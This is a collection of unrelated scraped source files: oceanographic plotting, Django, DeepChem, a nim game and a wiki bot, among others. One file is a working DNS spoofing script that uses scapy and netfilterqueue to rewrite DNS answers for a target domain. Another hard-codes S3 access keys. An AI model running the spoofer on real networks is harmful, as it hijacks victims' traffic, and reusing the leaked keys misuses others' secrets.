EGtottrans_vel=(daily.where(daily['across track velocity']<0)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans.plot(figsize=(12,3),label='Full water columns')
# axhline(0)
EGtottrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
EGtottrans_vel.plot(label='Only negative velocities')
ylabel('Transport (Sv)')
legend()
title('Transport at CF2-M1 (EGC system)')
savefig('../figures/trans/CF2-8trans.png')
# Split by water mass: EGC waters (S < 34.8) vs Irminger water (S >= 34.85)
# NOTE(review): the band 34.8 <= S < 34.85 falls in neither category -- verify
egtrans=(daily.where(daily.salinity<34.8)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
ictrans=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
cctrans.plot(figsize=(12,3),label='East Greenland COASTAL Current')
egtrans.plot(label='East Greenlandic Current Waters')
# axhline(0)
# egtrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
ictrans.plot(label='Irminger Current')
ylabel('Transport (Sv)')
legend()
title('EGC system transports')
savefig('../figures/trans/EGsystem_trans.png')
egtrans.plot(figsize=(12,3),label='East Greenlandic Current Waters')
axhline(0)
egtrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('[Sv]')
title('East Greenlandic Current transport')
savefig('../figures/trans/EGC_trans.png')
savefig('../figures/trans/EGC_trans.pdf')
# EGC vs scaled coastal current in one panel
figure()
egtrans.plot(figsize=(12,3),alpha=0.5,label='')
egtrans.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
cctrans_scaled.plot(alpha=0.5,label='')
cctrans_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 3)')
title('Transport in the EGC system')
ylabel('[Sv]')
legend()
savefig('../figures/trans/EGCboth_trans.png')
savefig('../figures/trans/EGCboth_trans.pdf',bbox_inches='tight')
ictrans.plot(figsize=(12,3))
ictrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('Transport (Sv)')
title('Irminger Current transport')
savefig('../figures/trans/IC_trans.png')
# T-S diagram of all measurements, with the 34.8 separation marked
hexbin(daily.salinity.values.flatten(),daily.temperature.values.flatten(),bins='log',cmap=cm.hot_r)
axvline(34.8,color='k')
colorbar(label='[log of number of measurements]')
ylabel('potential temperature [$^\circ$ C]')
xlabel('salinity')
title('Separation of Polar and Atlantic Water at 34.8')
savefig('../figures/trans/TS_separation.png')
savefig('../figures/trans/TS_separation.pdf',bbox_inches='tight')
#################################################################################
###################### Freshwater transport #####################################
#################################################################################
# Reference salinities for freshwater-transport calculations
srefa=34
srefb=34.8
# CF1 freshwater transport: vel * (S - Sref)/Sref * dz * dx, summed over depth
# NOTE(review): no /1e3 here although the axis is labelled mSv below, while
# icfresh further down DOES divide by 1e3 -- the unit handling looks
# inconsistent; verify
ccfresh=(cf1vel*(daily.salinity[0,:-1,:]-srefa)/srefa*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_refb=(cf1vel*(daily.salinity[0,:-1,:]-srefb)/srefb*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_scaled=ccfresh*2
figure()
ccfresh.plot(figsize=(12,3),color='orange')
ccfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the EGCC referenced to 34')
ylabel('mSv')
savefig('../figures/trans/CC_fresh.png')
figure()
ccfresh_refb.plot(figsize=(12,3),color='orange')
ccfresh_refb.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
# NOTE(review): title says "referenced to 35" but srefb is 34.8 -- verify
title('Freshwater transport in the referenced to 35')
ylabel('mSv')
savefig('../figures/trans/CC_fresh_refb.png')
# EGC freshwater transport (fresh side, S < 34.85), referenced to srefb
egfresh=(daily.where(daily.salinity<34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity<34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]).sum('distance').sum('depth')
figure()
egfresh.plot(figsize=(12,3))
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the EGC')
ylabel('mSv')
savefig('../figures/trans/EGC_fresh.png')
figure()
egfresh.plot(figsize=(12,3),alpha=0.5)
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
ccfresh_scaled.plot(alpha=0.5)
ccfresh_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 2)')
title('Freshwater transport in the EGC system')
ylabel('mSv')
legend()
savefig('../figures/trans/EGCboth_fresh.png')
savefig('../figures/trans/EGCboth_fresh.pdf',bbox_inches='tight')
# Irminger Current freshwater transport (salty side, S >= 34.85)
icfresh=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity>=34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
icfresh.plot(figsize=(12,3))
icfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the IC')
ylabel('mSv')
| [
"isabela.lebras@gmail.com"
] | isabela.lebras@gmail.com |
86310a44fc70e194901cd6f6ed1921448a4e2d40 | 789fe602dbd2d36fcd42cfd729758790a526055d | /numpy_linear_algebra.py | 3b0434f43c5aa188e8ec536ca12d2b80dd62f544 | [] | no_license | charukhandelwal/Hackerrank | 604b6be1b11c718b9c99e4a3eae9544ff629576d | 8ac84c481804d5b7a00fffc566312037ccb00685 | refs/heads/master | 2022-12-29T01:12:11.247527 | 2020-10-17T17:10:50 | 2020-10-17T17:10:50 | 304,927,588 | 1 | 0 | null | 2020-10-17T17:10:51 | 2020-10-17T17:03:23 | null | UTF-8 | Python | false | false | 1,413 | py | """
Problem Statement
The NumPy module also comes with a number of built-in routines for linear algebra calculations. These can be found in the sub-module linalg.
linalg.det
The linalg.det tool computes the determinant of an array.
print numpy.linalg.det([[1 , 2], [2, 1]]) #Output : -3.0
linalg.eig
The linalg.eig computes the eigenvalues and right eigenvectors of a square array.
vals, vecs = numpy.linalg.eig([[1 , 2], [2, 1]])
print vals #Output : [ 3. -1.]
print vecs #Output : [[ 0.70710678 -0.70710678]
# [ 0.70710678 0.70710678]]
linalg.inv
The linalg.inv tool computes the (multiplicative) inverse of a matrix.
print numpy.linalg.inv([[1 , 2], [2, 1]]) #Output : [[-0.33333333 0.66666667]
# [ 0.66666667 -0.33333333]]
Other routines can be found here
Task
You are given a square matrix A with dimensions NXN. Your task is to find the determinant.
Input Format
The first line contains the integer N.
The next N lines contains the N space separated elements of array A.
Output Format
Print the determinant of A.
Sample Input
2
1.1 1.1
1.1 1.1
Sample Output
0.0
"""
import numpy
# Python 2: `input()` evaluates the typed line, so N becomes an int
N = input()
# read N rows of N space-separated floats into an N x N array
A = numpy.array([map(float,raw_input().split()) for _ in xrange(N)])
# Python 2 print statement; numpy.linalg.det returns the determinant
print numpy.linalg.det(A)
"ayush.aceit@gmail.com"
] | ayush.aceit@gmail.com |
38996b3c70652eed0b025f1537a8abd67f8b6ed9 | bf12774c91bbad9dfcd887d89d78b2857f56d776 | /tests3.py | 6196867003d3c54b007209bd4ea23375faf91025 | [
"MIT"
] | permissive | tachijuan/python | d91a0fe0224a8801078776661caeab535fed80a7 | b4b9e9ce75b5e8426af9df41427fff659ff0cc60 | refs/heads/master | 2020-03-29T23:02:13.334929 | 2015-08-27T15:59:34 | 2015-08-27T15:59:34 | 27,557,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | import boto
import boto.s3.connection
# SECURITY(review): hard-coded credentials committed to source control --
# rotate these keys and load them from the environment or a config file
ak = 'c3BlY3RyYQ=='
sk = 'bjQpZe2b'
# connect to a non-AWS S3 endpoint over plain HTTP, using path-style
# ("ordinary") bucket addressing
c = boto.connect_s3(aws_access_key_id = ak, aws_secret_access_key = sk, host = '10.10.1.237',
        is_secure=False, calling_format = boto.s3.connection.OrdinaryCallingFormat())
print c
# list every bucket with its creation date (Python 2 print statements)
for b in c.get_all_buckets():
    print "%s\t%s" % (b.name,b.creation_date)
| [
"juan@orlandini.us"
] | juan@orlandini.us |
3174910891906b633e4d6ffa38df2cf3f8d72564 | b8ef2769bf6d9159457faa642f57c91a01533ef0 | /5 dns_spoof/dns-spoofer-sivet.py | b88f75539ed0dc823dd8078fe64ea44669d2036d | [] | no_license | C-BOE86/Python-Ethical-Hacking-Tools | 096d9252096536164a18c6449d105d3807415e51 | 0ca3dd29bc35722e8e6a55a2a6d56036dccb856b | refs/heads/master | 2022-03-23T04:29:30.215390 | 2019-12-03T19:57:57 | 2019-12-03T19:57:57 | 198,090,999 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | #!/usr/bin/python2
#capture the request packet from client and save to a queue using iptables and alter send or recieve modified packet
#convert the raw packet to scapy packet to modify the request
import netfilterqueue
import scapy.all as scapy
# Rewrite DNS answers for the target domain so clients resolve it to localhost.
def process_packet(packet):
    # Re-parse the raw NFQUEUE payload as a scapy IP packet.
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "sivet.in" in qname:
            print "[+] Spoofing Target "
            # Forge a single answer record pointing the queried name at 127.0.0.1.
            answer = scapy.DNSRR(rrname=qname,rdata="127.0.0.1")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            # Delete stale length/checksum fields so scapy recomputes them on send.
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len
            packet.set_payload(str(scapy_packet))
    # Release the (possibly modified) packet back to the kernel.
    packet.accept()
# Bind to NFQUEUE number 0 (set up via iptables) and process packets forever.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()
| [
"noreply@github.com"
] | C-BOE86.noreply@github.com |
e10a899ea0e195ad55ab677dbc9616a9e3f64832 | f72fa4432e6abb742cbf1c61c580db1ed688a311 | /day27/s21crm/crm/forms/school.py | c8e42b166247fd56e11cee8ef0a4b0e7def14cb2 | [] | no_license | huningfei/python | 7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7 | 9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2 | refs/heads/master | 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 | Python | UTF-8 | Python | false | false | 401 | py | from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
    """ModelForm exposing every School field, with Bootstrap styling on title."""
    class Meta:
        model = models.School  # note: the attribute is `model` (singular), not `models`
        fields = '__all__'
        error_messages = {
            'title': {'required': '学校不能为空'}
        }
        widgets = {
            'title': forms.TextInput(attrs={'class': 'form-control'})
        }
| [
"huningfei@126.com"
] | huningfei@126.com |
83a81d4031b4d0b27fc071ab22e653d8499b1881 | 948326722b8ff0cda1a06ea8485e0871033ede92 | /Chapter06/rnai.py | cc8415c23405e19fc19775abf0dc03846ebe5fa2 | [
"MIT"
] | permissive | peastman/DeepLearningLifeSciences | 0bd3caf1f1d4fc9b585daec39d859b33f8be60e9 | 3de61733433c3a214c4ddd116bc1c785f9e49674 | refs/heads/master | 2021-06-18T17:01:00.827567 | 2021-04-20T17:20:33 | 2021-04-20T17:20:33 | 206,670,326 | 0 | 0 | MIT | 2019-09-05T22:53:01 | 2019-09-05T22:53:00 | null | UTF-8 | Python | false | false | 1,130 | py | # Train a model to predict how well sequences will work for RNA interference.
import deepchem as dc
import tensorflow as tf
import tensorflow.keras.layers as layers
import matplotlib.pyplot as plot  # NOTE(review): imported but never used below
# Build the model: two Conv1D+Dropout stages over (21, 4) inputs (presumably
# one-hot encoded 21-nt sequences -- confirm), then one sigmoid output.
features = tf.keras.Input(shape=(21, 4))
prev = features
for i in range(2):
    prev = layers.Conv1D(filters=10, kernel_size=10, activation=tf.nn.relu, padding='same')(prev)
    prev = layers.Dropout(rate=0.3)(prev)
output = layers.Dense(units=1, activation=tf.math.sigmoid)(layers.Flatten()(prev))
keras_model = tf.keras.Model(inputs=features, outputs=output)
model = dc.models.KerasModel(
    keras_model,
    loss=dc.models.losses.L2Loss(),
    batch_size=1000,
    model_dir='rnai')
# Load the data.
train = dc.data.DiskDataset('train_siRNA')
valid = dc.data.DiskDataset('valid_siRNA')
# Train the model, tracking its performance on the training and validation datasets
# (Pearson r, printed after every 10-epoch chunk).
metric = dc.metrics.Metric(dc.metrics.pearsonr, mode='regression')
for i in range(20):
    model.fit(train, nb_epoch=10)
    print(model.evaluate(train, [metric])['pearsonr'])
    print(model.evaluate(valid, [metric])['pearsonr'])
| [
"peastman@stanford.edu"
] | peastman@stanford.edu |
c097c3802eeec172bcba8191ceb9be955f182d7d | 169aa5a31e8d413b12f97b7a36a397c46cd5cbd3 | /dataUtils.py | 500bc7b59f6062758009852bc2713566df9978c1 | [] | no_license | XWQlover/tensorflow2.0-DKT-XWQ | 5d049e9db63bca598d0504fc74c4c5e37b10b3af | d99e283ed22d2c3e91196056aa897fcf6e71bd73 | refs/heads/master | 2022-12-13T06:49:18.632671 | 2020-09-17T10:02:12 | 2020-09-17T10:02:12 | 289,620,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,699 | py | import pandas as pd
import numpy as np
import tensorflow as tf
class AssismentData():
    def __init__(self):
        """Load and preprocess the ASSISTments skill-builder log.

        Builds self.seq: per-user tuples of (input skill+correctness codes,
        next-step skill ids, next-step correctness labels), shifted by one.
        """
        self.data = pd.read_csv("/content/drive/My Drive/DKT/skill_builder_data.csv")
        self.data = self.data.dropna()
        # Re-encode raw ids as dense integer codes.
        self.data["user_id"], _ = pd.factorize(self.data["user_id"])
        self.data["skill_id"], _ = pd.factorize(self.data["skill_id"])
        # Fold correctness into the skill id: 2*skill for wrong, 2*skill+1 for right.
        self.data["skills_correctness"] = self.data.apply(
            lambda x: x.skill_id * 2 if x.correct == 0.0 else x.skill_id * 2 + 1, axis=1)
        # Keep only users with more than one interaction (need an input/target pair).
        self.data = self.data.groupby("user_id").filter(lambda q: len(q) > 1).copy()
        # Inputs are all but the last step; targets are the sequence shifted by one.
        self.seq = self.data.groupby('user_id').apply(
            lambda r: (
                r["skills_correctness"].values[:-1],
                r["skill_id"].values[1:],
                r['correct'].values[1:]
            )
        )
    def datasetReturn(self, shuffle=None, batch_size=32, val_data=None):
        """Build padded, batched train/validation tf.data pipelines from self.seq.

        NOTE(review): the `batch_size` and `val_data` parameters are currently
        ignored -- batching is hard-coded to 50 below; confirm the intent.
        """
        dataset = tf.data.Dataset.from_generator(lambda: self.seq, output_types=(tf.int32, tf.int32, tf.int32))
        if shuffle:
            dataset = dataset.shuffle(buffer_size=shuffle)
        # Pad variable-length sequences with -1 so the model can mask them out.
        MASK_VALUE = -1
        dataset = dataset.padded_batch(
            batch_size=50,
            padding_values=(MASK_VALUE, MASK_VALUE, MASK_VALUE),
            padded_shapes=([None], [None], [None]),
            drop_remainder=True
        )
        # Count batches by iterating the pipeline once.
        i = 0
        for l in dataset.as_numpy_iterator():
            i += 1
        dataset = dataset.shuffle(buffer_size=50)
        # 80/20 train/validation split at batch granularity.
        test_size = int(np.ceil(i * 0.2))
        train_size = i - test_size
        train_data = dataset.take(train_size)
        dataset = dataset.skip(train_size)
        return train_data, dataset | [
"794632026@qq.com"
] | 794632026@qq.com |
909457621a61debda7558bb9f60c2c7feb57b2d0 | 76a402b7db1432f9bf8b9605416521a4284ce1e2 | /nim_game.py | 95d3be8cab232b6f99b6eef35ff32fa60baa5ddf | [] | no_license | SuguruChhaya/nim-game | 7aa915a475d414288fbb33957cad88ec4dac0c1d | 6f345a36dc3a26ee8e5f89c139718a21b7050232 | refs/heads/master | 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,498 | py | import random
'''
Not to create objects but just to manage the methods.
'''
class MainGame():
    """Interactive counting game: players alternate adding 1..increment to a
    running total; whoever reaches reaching_number loses. The computer steers
    the total onto the precomputed safe totals in win_number_list."""
    def __init__(self, reaching_number, increment, goesfirst):
        self.reaching_number = reaching_number
        self.increment = increment
        self.goesfirst = goesfirst  # '0' = computer moves first, '1' = human
        #*Keeps track of the previous numbers
        self.total = 0
        self.current_choice = 0
        #*Finding the reaching_number - 1 number
        self.ending_win_number = self.reaching_number - 1
        self.follow_increment = self.increment + 1
        #*Rather than making the move based on the past move, I should try to get it close to the win_number_list
        # Safe totals: reaching_number - 1, stepping down by increment + 1.
        self.win_number_list = []
        for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
            self.win_number_list.append(i)
        self.win_number_list = sorted(self.win_number_list)
    def gotoplayerturn(self):
        """Start the game with whichever side goesfirst selects."""
        if self.goesfirst == '0':
            self.no_input_character()
        elif self.goesfirst == '1':
            self.input_character()
    def no_input_character(self):
        #*This function is for the characters without inputs (computer, you advice)
        print("\nThe computer's turn")
        print(f"\nCurrent total: {self.total}")
        if self.total not in self.win_number_list:
            # Move onto the nearest reachable safe total.
            for i in self.win_number_list:
                if i > self.total and i - self.total <= self.increment:
                    self.current_choice = i - self.total
            print(f"The computer chooses: {self.current_choice}\n")
            self.total += self.current_choice
        #*Just in case the player knows the strategy and there is no hope to win,
        #*I will pick a random int
        elif self.total in self.win_number_list:
            self.current_choice = random.randint(1, self.increment)
            print(f"The computer chooses: {self.current_choice}\n")
            self.total += self.current_choice
        if self.total >= self.reaching_number:
            print(f"The computer reached {self.reaching_number}.")
            print("The computer loses.")
        else:
            self.input_character()
    def input_character(self):
        #*This function is for the characters with inputs (you, your friend)
        not_valid = True
        while not_valid:
            print('\nYour turn:')
            print(f"\nCurrent total: {self.total}")
            print(f"Pick the increment (max:{self.increment})")
            self.current_choice = input("You choose: ")
            try:
                self.current_choice = int(self.current_choice)
                if not 1 <= self.current_choice <= self.increment:
                    raise(ValueError)
                else:
                    self.total += self.current_choice
                    not_valid = False
                    if self.total >= self.reaching_number:
                        print(f"You reached {self.reaching_number}.")
                        print("You lose.")
                    else:
                        # Hand the turn back to the computer (mutual recursion).
                        self.no_input_character()
            except ValueError:
                print("Enter valid command or integer.")
                not_valid = True
# Interactive setup: prompt for game parameters, validate, then start play.
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
    try:
        print("\nThe reaching number has to be between 20 and 100 (inclusive).")
        reaching_number_str = input("Enter reaching number: ")
        print("\nThe max increment has to be between 3 and 10 (inclusive).")
        incement_str = input("Enter max increment: ")
        reaching_number = int(reaching_number_str)
        increment = int(incement_str)
        not_valid = False
        # Out-of-range values are funneled through the same ValueError handler.
        if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
            raise(ValueError)
        else:
            zero_player = "The computer"
            one_player = "You"
            goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
            if goesfirst in ['0', '1']:
                game = MainGame(reaching_number, increment, goesfirst)
                game.gotoplayerturn()
            else:
                raise (ValueError)
    except ValueError:
        print("Enter a valid command or integer.")
        not_valid = True
| [
"suguruchhaya@gmail.com"
] | suguruchhaya@gmail.com |
6759479a9640fc8ea7ba928109da4abbb456fb4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py | 0b936ae903da1273501fd3e5f09c85bf73708585 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
zeta=0
tan=0
a=input('Digite o valor de a')
b=input('Digite o valor de b')
c=a%b
# NOTE(review): this loop looks incomplete -- neither a nor c is ever updated,
# and b can be overwritten with zeta (initially 0), after which a % b would
# raise ZeroDivisionError. Likely an unfinished GCD attempt.
while a%b!=0:
    if b%c!=0:
        b=zeta
        zeta=a
print(zeta) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
76a4888ad521d027ce01d8cbb5f9f5c5052d0f4d | ac085f74b70ffd0d7383a611c79461e13963c623 | /Disgaea 2/skill-grind-script.py | 4b5ba5c58a715572509bc21017766ef539b4e1c6 | [
"MIT"
] | permissive | NotTidduss/auto-input-scripts | 5c95fded917ffda7241faefd4526bb7b698115cb | 71800940231f149c75ff87a6a7e3ddb56e1459d3 | refs/heads/main | 2023-04-24T13:54:45.298304 | 2021-05-06T05:47:41 | 2021-05-06T05:47:41 | 348,642,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,689 | py | # Requirements:
# - Skill to grind needs adjustments in script - see !!!.
# - Characters to need to be positioned above to invincible target. I use the first invincible tile in stage 4-4.
# - Characters should have as much SP as possible
########## ------------ Key bindings ------------ ##########
STOP_SCRIPT = 'ESCAPE'
MOVE_UP = 'w'
MOVE_LEFT = 'a'
MOVE_RIGHT = 'd'
MOVE_DOWN = 's'
CONFIRM = 'k'
CANCEL = 'l'
OPEN_MENU = 'i'
WAIT = 'p'
################## Command infrastructure ##################
import keyboard
import time
class Command:
    """One scripted input step: hold `key` for `duration` seconds, or simply
    sleep for `duration` when `is_silence` is set."""
    def __init__(self, key, duration, is_silence = False):
        self.key = key
        self.duration = duration
        self.is_silence = is_silence
    def execute(self):
        """Perform the step (blocking): silent wait, or key press-hold-release."""
        if (self.is_silence):
            print("Silence for " + str(self.duration) )
            time.sleep(self.duration)
        else:
            print("Key " + self.key + " for " + str(self.duration) + " seconds.")
            keyboard.press(self.key)
            time.sleep(self.duration)
            keyboard.release(self.key)
### -- Scenario to select stage, move chars and clear -- ###
# configure commands
move_up = Command(MOVE_UP, 0.1)
move_left = Command(MOVE_LEFT, 0.1)
move_right = Command(MOVE_RIGHT, 0.1)
move_down = Command(MOVE_DOWN, 0.1)
confirm = Command(CONFIRM, 0.3)
open_menu = Command(OPEN_MENU, 0.2)
wait = Command(WAIT, 6)
intermission = Command(WAIT, 0.1)
safetyCancel = Command(CANCEL, 0.1)
# set commands
commands = [
wait, # initial wait for turn
move_up, # move cursor to character
intermission,
confirm, # open character menu
move_down, # choose special menu
intermission,
move_down,
intermission,
confirm, # open special menu
move_down, # choose skill !!!
intermission,
move_down,
intermission,
move_down,
intermission,
confirm, # open skill selection
intermission,
confirm, # confirm target selection
open_menu, # open menu for END TURN
move_down,
confirm, # END TURN
wait,
safetyCancel # in case the loop gets stuck, this might fix it
]
########################## Logic ###########################
is_continue = True
STOP_EVENT = keyboard.KeyboardEvent('down', STOP_SCRIPT, STOP_SCRIPT)
def stop_script(keyboard_event):
    """Keyboard hook: flag the main loop to exit once the stop key is seen."""
    global is_continue
    if keyboard_event.name != STOP_EVENT.name:
        return
    print("Goodbye.")
    is_continue = False
if __name__ == "__main__":
global is_continue
keyboard.on_press(stop_script)
while is_continue:
for command in commands:
command.execute() | [
"nottidduss@gmail.com"
] | nottidduss@gmail.com |
61f849141c82b9fc7c57d859953c3c157e0f98be | 07f6550970166923b8ae0b5d647552e850e5acc8 | /reviewpost/migrations/0001_initial.py | 0b9f6fabc05ccf3420eb08163a28afb9ad26f83b | [] | no_license | grasshopper-dev/reviewproject | 33ed8c7ddb81d16552762ed1e06f6bed0e373633 | ef2212e88f27441ed1aa254b5c607cfd2c4c5a5b | refs/heads/main | 2023-03-13T06:21:34.385623 | 2021-03-04T00:18:07 | 2021-03-04T00:18:07 | 344,300,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | # Generated by Django 3.1.6 on 2021-02-24 23:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: creates ReviewModel with an author FK to AUTH_USER_MODEL."""
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='ReviewModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('content', models.TextField()),
                ('images', models.ImageField(upload_to='')),
                ('useful_review', models.IntegerField(blank=True, default=0, null=True)),
                ('useful_review_record', models.TextField()),
                ('evaluation', models.CharField(choices=[('良い', '良い'), ('悪い', '悪い')], max_length=10)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"grasshopperdevel2019@gmail.com"
] | grasshopperdevel2019@gmail.com |
4831f524e40ae85b2eea36bd5a913cd79f31c444 | e2e903579b9167e42fe7b3fd20b294b730e14664 | /ch6/ch6note.py | de7c09c4aba9616fa3eb6242a5abbf64c0dac404 | [] | no_license | Joyounger/PythonVisualQuickStartGuide | afd97708bb06c4c5df44caea58d30920701be9ab | 3d667863aeca3f83f5f6126b3dfa549ceeda78ef | refs/heads/master | 2020-03-21T04:13:23.864747 | 2018-09-16T02:25:59 | 2018-09-16T02:27:07 | 138,097,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py |
# 负数索引,沿着从右向左的方向,用负数表示字符串中的索引
# 这时字符串的最后一个字符为s[-1]
# ord('a') 计算字符unicode编码
# chr(97) 根据编码值返回字符
# python计算字符串长度时,并不将\视为额外的字符
len('\\') # 1
len('a\nb\nc') # 5
# s.count(t) 返回t在s中出现的次数
# s.encode() 设置s的编码
# s.join(seq) 使用s将seq中的字符串连接成一个字符串
# s.maketrans(old, new) 创建一个转换表,用于将old中的字符改为new中相应的字符
| [
"942510346@qq.com"
] | 942510346@qq.com |
3ab104c3a0615fdf4f99d8cde30bb2d050d339a2 | b7136c09b98d613fe3dd93df317ec7ddd0012e7b | /src/rcarl.py | 02dd3ef4bcd1f12e27006ad7a327b0ed3501ce60 | [
"MIT"
] | permissive | fossifer/WhitePhosphorus-bot | 54d37492e500c9002d4ecb8cfabd259f3e52968c | cbb5b4e4e6667fc7b6a18f7e7dbc078722b83c7f | refs/heads/master | 2023-05-27T10:15:34.511951 | 2019-12-09T14:07:59 | 2019-12-09T14:07:59 | 83,035,902 | 1 | 0 | MIT | 2023-05-22T22:28:06 | 2017-02-24T11:43:03 | Python | UTF-8 | Python | false | false | 2,994 | py | # TODO: cache the status of titles
import datetime
from bs4 import BeautifulSoup
from . import botsite
from .core import EditQueue, check, log
from .botsite import remove_nottext, get_summary
working_title = 'Template:Recent changes article requests/list'
delay_days = 7
whitelist_title = 'User:%s/controls/rcarl/whitelist' % botsite.bot_name
whitelist = []
def load_whitelist():
    """Read the on-wiki control page and fill the module-level whitelist."""
    global whitelist
    site = botsite.Site()
    text = site.get_text_by_title(whitelist_title)
    # The first and last lines are the <pre> / </pre> wrappers -- skip them.
    for raw in text.splitlines()[1:-1]:
        # Drop any inline '#' comment, then surrounding whitespace.
        entry = raw.partition('#')[0].strip()
        if entry:
            whitelist.append(entry)
def check_create_time(site, articles, exists):
    """Return one bool per title: True when the page exists, is not
    whitelisted, and its first revision is at least delay_days old."""
    ret = [False] * len(articles)
    cts = datetime.datetime.utcnow()
    for i, title in enumerate(articles):
        if not exists[i] or title in whitelist:
            continue
        # Ask the wiki API for the oldest revision's timestamp.
        r = site.api_get({'action': 'query', 'prop': 'revisions',
                          'rvdir': 'newer', 'rvlimit': 1, 'rvprop': 'timestamp',
                          'titles': title, 'converttitles': 1}, 'query')
        page = r.get('pages')
        create_ts = None
        for k, v in page.items():
            rev = v.get('revisions')
            if type(rev) is list and rev:
                create_ts = rev[0].get('timestamp')
        if create_ts is None:
            log('%s: Failed to parse created time of [[%s]]' % (cts, title))
            log(r)
            continue
        create_ts = datetime.datetime.strptime(create_ts, '%Y-%m-%dT%H:%M:%SZ')
        if (cts - create_ts).days >= delay_days:
            ret[i] = True
    return ret
def gen_rev(text):
    """Given the current list-page wikitext, return {'text', 'summary'} with
    the removable (existing, old-enough) entries dropped, or None if none."""
    site = botsite.Site()
    lines = text.splitlines()
    # Body lines hold one linked title each; strip the leading list marker.
    articles = [remove_nottext(line.strip()[1:]) for line in lines[1:-2]]
    exists = [False] * len(articles)
    # Render all titles at once; a redlink href marks a missing page.
    html = site.parse('[['+']][['.join(articles)+']]')
    soup = BeautifulSoup(html, 'html.parser')
    i = 0
    for a in soup.find_all('a'):
        if '&action=edit&redlink=1' not in a.get('href'):
            exists[i] = True
        i += 1
    to_remove = check_create_time(site, articles, exists)
    if not any(to_remove):
        return None
    # Keep the header (first line) and the two-line footer intact.
    n_articles = [lines[i+1] for i in range(len(articles)) if not to_remove[i]]
    prefix, suffix = lines[0], lines[-2] + '\n' + lines[-1]
    new_text = prefix + '\n' + '\n'.join(n_articles) + '\n' + suffix
    summary = get_summary('rcarl', '移除%d个已存在条目' % (len(articles)-len(n_articles)))
    return {'text': new_text, 'summary': summary}
@check('rcarl')
def main():
    """rcarl task entry point: refresh the whitelist, then queue an edit
    that rewrites the request-list page via gen_rev."""
    load_whitelist()
